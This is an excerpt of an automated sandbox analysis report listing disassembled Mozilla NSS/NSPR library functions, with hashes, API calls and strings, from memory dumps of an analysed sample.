Opcode Fuzzy Hash: 8848ba6c6bf95a52da92e5ab5bfd17cee23477c80e1bcc7f78f23e458a9768b6
Instruction Fuzzy Hash: 0411B672A01225ABD704CF25D88479AB775BF81318F04526BD419CFA41C779E8C5C7C1

Function 6D010C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713e62b0570084f16d6f21b6011c1cf03b4741b49b715b4e56a65a39b06ed7e3
Instruction ID: c5e70d5c296f15689374bd5b5e539d056c7bb360977997e457097f0abb6b9b07
Opcode Fuzzy Hash: 713e62b0570084f16d6f21b6011c1cf03b4741b49b715b4e56a65a39b06ed7e3
Instruction Fuzzy Hash: 00118F757082069FEB00DF59CC807AA77B5FF85364F14816DD8698B341DB72E8168BA1

Function 6D010D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 5fdd94956f285c66c3d607f4412a93528defca84ee219d482a1bf64adda1e027
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 91E0923AA0C015A7EB148E4AC851BB97399EF81619FA4C07EEC9D9F601D733F8138781

Function 00419AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6CF71D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CF71D46), ref: 6CF72345

Strings

CKR_DEVICE_REMOVED, xrefs: 6CF72261
CKR_STATE_UNSAVEABLE, xrefs: 6CF72037
CKR_MUTEX_NOT_LOCKED, xrefs: 6CF72225
CKR_SIGNATURE_LEN_RANGE, xrefs: 6CF720D9
CKR_OPERATION_CANCEL_FAILED, xrefs: 6CF71F77
CKR_CURVE_NOT_SUPPORTED, xrefs: 6CF72179
CKR_PIN_LEN_RANGE, xrefs: 6CF72061
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6CF72275
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6CF71FD7
CKR_OPERATION_ACTIVE, xrefs: 6CF722B8
CKR_PIN_INCORRECT, xrefs: 6CF71D92
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6CF72320
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6CF7232E
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6CF7218D
CKR_NEXT_OTP, xrefs: 6CF7222F
CKR_TEMPLATE_INCOMPLETE, xrefs: 6CF71F95
CKR_FUNCTION_REJECTED, xrefs: 6CF72289
CKR_NEW_PIN_MODE, xrefs: 6CF71E9F
CKR_WRAPPED_KEY_INVALID, xrefs: 6CF71FB5
CKR_MUTEX_BAD, xrefs: 6CF71F49
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6CF722FF
CKR_BUFFER_TOO_SMALL, xrefs: 6CF72183
rv = %s, xrefs: 6CF72340
CKR_SIGNATURE_INVALID, xrefs: 6CF720CF
CKR_OK, xrefs: 6CF71DFC
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6CF71DE0
CKR_DEVICE_ERROR, xrefs: 6CF7229D
CKR_TOKEN_NOT_PRESENT, xrefs: 6CF71F81
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6CF72015
CKR_SAVED_STATE_INVALID, xrefs: 6CF71E56
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6CF72327
CKR_FUNCTION_CANCELED, xrefs: 6CF71E73
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6CF71F0F
CKR_TEMPLATE_INCONSISTENT, xrefs: 6CF71EE1
CKR_RANDOM_NO_RNG, xrefs: 6CF722A7
CKR_PIN_LOCKED, xrefs: 6CF72075
rv = 0x%x, xrefs: 6CF72312
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6CF72293, 6CF7233F
CKR_DEVICE_MEMORY, xrefs: 6CF71FF3
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6CF72319
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6CF71F8B
CKR_PIN_EXPIRED, xrefs: 6CF7206B
CKR_INFORMATION_SENSITIVE, xrefs: 6CF722B1
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6CF7226B
CKR_OBJECT_HANDLE_INVALID, xrefs: 6CF7204D
CKR_PIN_INVALID, xrefs: 6CF72057
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6CF7227F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 24f95fe3eba65f8546d1f3a9ceb2dfddf3d271d27f60804efd1100e53e5efb29
Instruction ID: 995d2fdc28aecc5292a5c13436b59a9e285d1a2204eb7405ecb7a88a46552585
Opcode Fuzzy Hash: 24f95fe3eba65f8546d1f3a9ceb2dfddf3d271d27f60804efd1100e53e5efb29
Instruction Fuzzy Hash: 3F61DC2564D040C7FEBC4708B1EC37E2125AB46315F74813FE58A8EE9BD6ABCA4546B3

Function 6CFA5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CFA5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CFA5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CFA5E5C
free.MOZGLUE(00000000), ref: 6CFA5E7E
free.MOZGLUE(00000000), ref: 6CFA5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6CFA5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CFA5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CFA5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CFA5EF0
free.MOZGLUE(00000000), ref: 6CFA5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CFA5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CFA5F5B
free.MOZGLUE(00000000), ref: 6CFA5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CFA5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CFA5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CFA5FC4
free.MOZGLUE(00000000), ref: 6CFA5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CFA5FE9
free.MOZGLUE(00000000), ref: 6CFA5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CFA600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFA6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CFA605A
PR_smprintf.NSS3(6D07AAF9,00000000), ref: 6CFA606A
free.MOZGLUE(00000000), ref: 6CFA607C
free.MOZGLUE(00000000), ref: 6CFA609A
free.MOZGLUE(00000000), ref: 6CFA60B2
free.MOZGLUE(?), ref: 6CFA60CE

Strings

noModDB, xrefs: 6CFA5EEA
readOnly, xrefs: 6CFA5E56
%s/%s, xrefs: 6CFA6055
secmod=, xrefs: 6CFA5FB1
configDir=, xrefs: 6CFA5F9D
pkcs11.txt, xrefs: 6CFA5F47, 6CFA5F7C, 6CFA603A, 6CFA6053
flags, xrefs: 6CFA5E3A, 6CFA5EC6, 6CFA5F30
secmod.db, xrefs: 6CFA5EA0
forceSecmodChoice, xrefs: 6CFA5F55

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 339aaabea50c3ec09159a9028eadd4164f01492f4ee2e30989af7183946c0034
Instruction ID: d2d61338282744acd3d25737b5b3a0bd38e502048c2433e980f8e14615c5e01d
Opcode Fuzzy Hash: 339aaabea50c3ec09159a9028eadd4164f01492f4ee2e30989af7183946c0034
Instruction Fuzzy Hash: AF91E8F5D04641DBFF118FA99C81BABBBA4AF0924CF080060FD59DB642E731D546C7A2

Function 6CF31D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6CF31DA3

Part of subcall function 6D0098D0: calloc.MOZGLUE(00000001,00000084,6CF30936,00000001,?,6CF3102C), ref: 6D0098E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CF31DB2

Part of subcall function 6CF31240: TlsGetValue.KERNEL32(00000040,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF31267
Part of subcall function 6CF31240: EnterCriticalSection.KERNEL32(?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF3127C
Part of subcall function 6CF31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF31291
Part of subcall function 6CF31240: PR_Unlock.NSS3(?,?,?,?,6CF3116C,NSPR_LOG_MODULES), ref: 6CF312A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF31DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CF31E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CF31EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CF31ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CF31EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CF31F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF31F34
PR_SetLogBuffering.NSS3(00004000), ref: 6CF31F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CF31F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CF31F83
PR_SetLogFile.NSS3(00000000), ref: 6CF31FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CF31FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6CF31FCB
free.MOZGLUE(00000000), ref: 6CF31FD2

Strings

sync, xrefs: 6CF31E46
NSPR_LOG_MODULES, xrefs: 6CF31DAD
Unable to create nspr log file '%s', xrefs: 6CF31FB3
timestamp, xrefs: 6CF31EC4
, %n, xrefs: 6CF31E6B
bufsize, xrefs: 6CF31E9B
all, xrefs: 6CF31F0E
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6CF31E27
append, xrefs: 6CF31EE6
NSPR_LOG_FILE, xrefs: 6CF31F69

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 8cd3a2681382e59b02d3b01745f175582221f10efe887dc8cc86b40a8b972ade
Instruction ID: 6e325d0e41917855d965d6a9b393935fbf670c4c6f595756a6344d92a869462e
Opcode Fuzzy Hash: 8cd3a2681382e59b02d3b01745f175582221f10efe887dc8cc86b40a8b972ade
Instruction Fuzzy Hash: 0051A1B1D04229ABEF00CBF5CD44B9E77B8AF05308F089128E91EDB641E775E558CB95

Function 6CFA4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4C5B
PR_smprintf.NSS3(6D07AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFA4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFA4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFA4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CF94F51,00000000), ref: 6CFA4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CFA4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CFA4DA2
free.MOZGLUE(?), ref: 6CFA4DB9
free.MOZGLUE(00000000), ref: 6CFA4DCF

Strings

%s,%s, xrefs: 6CFA4C4B
slotFlags, xrefs: 6CFA4D34
every, xrefs: 6CFA4CA1
timeout, xrefs: 6CFA4C91
rootFlags, xrefs: 6CFA4D47
ootT, xrefs: 6CFA4D1A
0x%08lx=[%s %s], xrefs: 6CFA4D80
any, xrefs: 6CFA4C96
rust, xrefs: 6CFA4D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CFA4D9D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: d2ed58566f64c2c2d640856721a6c9ed529f863335e9b94099a6871ff954d81f
Instruction ID: 89e3de90dd21d95a44a77ea0e714697e94e3b89034648a3c6bf277ce2cf49b95
Opcode Fuzzy Hash: d2ed58566f64c2c2d640856721a6c9ed529f863335e9b94099a6871ff954d81f
Instruction Fuzzy Hash: B9416BB2C00141EBE7119FA49C40BBBBE65AF82308F185124EC195F341EB31E926C7D7

Function 6CF4DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CF4DDDE

Part of subcall function 6CFA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF487ED,00000800,6CF3EF74,00000000), ref: 6CFA1000
Part of subcall function 6CFA0FF0: PR_NewLock.NSS3(?,00000800,6CF3EF74,00000000), ref: 6CFA1016
Part of subcall function 6CFA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF487ED,00000008,?,00000800,6CF3EF74,00000000), ref: 6CFA102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CF4DDF5

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CF4DE34
PR_Now.NSS3 ref: 6CF4DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CF4DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF4DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CF4DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CF4DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6CF4DEF0
PR_smprintf.NSS3(6D07AAF9,(NULL) (Validity Unknown)), ref: 6CF4DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF4DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CF4DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CF4DF33
free.MOZGLUE(00000000), ref: 6CF4DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF4DF4B
free.MOZGLUE(00000000), ref: 6CF4DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CF4DF8E

Strings

{???}, xrefs: 6CF4DE8B
(NULL) (Validity Unknown), xrefs: 6CF4DEFA
%s%s, xrefs: 6CF4DEEB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 69c5b9176e6bf51d8adb566d23d32ac0906230eebc41765cfcfc161afe48870f
Instruction ID: e09b232653ae9be51cc141399d5736d871a885798716e34b49040d5dca5a9b81
Opcode Fuzzy Hash: 69c5b9176e6bf51d8adb566d23d32ac0906230eebc41765cfcfc161afe48870f
Instruction Fuzzy Hash: F351A2B5D002059BEB109F65DC41BAF7EB8AF85358F158029EC09EB702E731D911CBE2

Function 6CF82D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CF82DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CF82E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CF82E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CF82E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CF54F1C,?,-00000001,00000000,?), ref: 6CF82E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CF54F1C,?,-00000001,00000000), ref: 6CF82E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF82EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF82EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF82EF8
PR_Unlock.NSS3(?), ref: 6CF82F62
TlsGetValue.KERNEL32 ref: 6CF82F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CF82F9E
PR_Unlock.NSS3(?), ref: 6CF82FCA
TlsGetValue.KERNEL32 ref: 6CF8301A
EnterCriticalSection.KERNEL32(?), ref: 6CF8302E
PR_Unlock.NSS3(?), ref: 6CF83066
PR_SetError.NSS3(00000000,00000000), ref: 6CF83085
PR_Unlock.NSS3(?), ref: 6CF830EC
TlsGetValue.KERNEL32 ref: 6CF8310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CF83124
PR_Unlock.NSS3(?), ref: 6CF8314C

Part of subcall function 6CF69180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CF9379E,?,6CF69568,00000000,?,6CF9379E,?,00000001,?), ref: 6CF6918D
